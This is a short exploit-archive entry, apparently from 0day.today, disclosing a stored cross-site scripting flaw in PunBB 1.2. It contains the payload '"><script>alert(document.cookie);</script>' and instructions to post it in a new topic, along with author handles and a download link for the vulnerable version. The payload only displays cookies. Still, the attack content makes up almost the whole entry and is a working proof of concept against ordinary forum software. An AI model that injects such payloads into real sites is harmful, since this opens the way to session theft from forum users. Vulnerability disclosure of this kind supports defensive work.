id: 11699
date: 04/09/2010
title: PunBB 1.2 XSS Vulnerability
author: The_Exploited
cves: 

===========================
PunBB 1.2 XSS Vulnerability
===========================


@Title: PunBB 1.2 XSS Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: "><script>alert(document.cookie);</script>

@Demo: You have to put the Exploit in your "New topic" - The HTML is ON

@CMS Download: http://punbb.informer.com/download/museum/punbb-1.2.zip

@CMS Version: 1.2

@Date: 2010-04-09



#  0day.today [2023-03-27]  #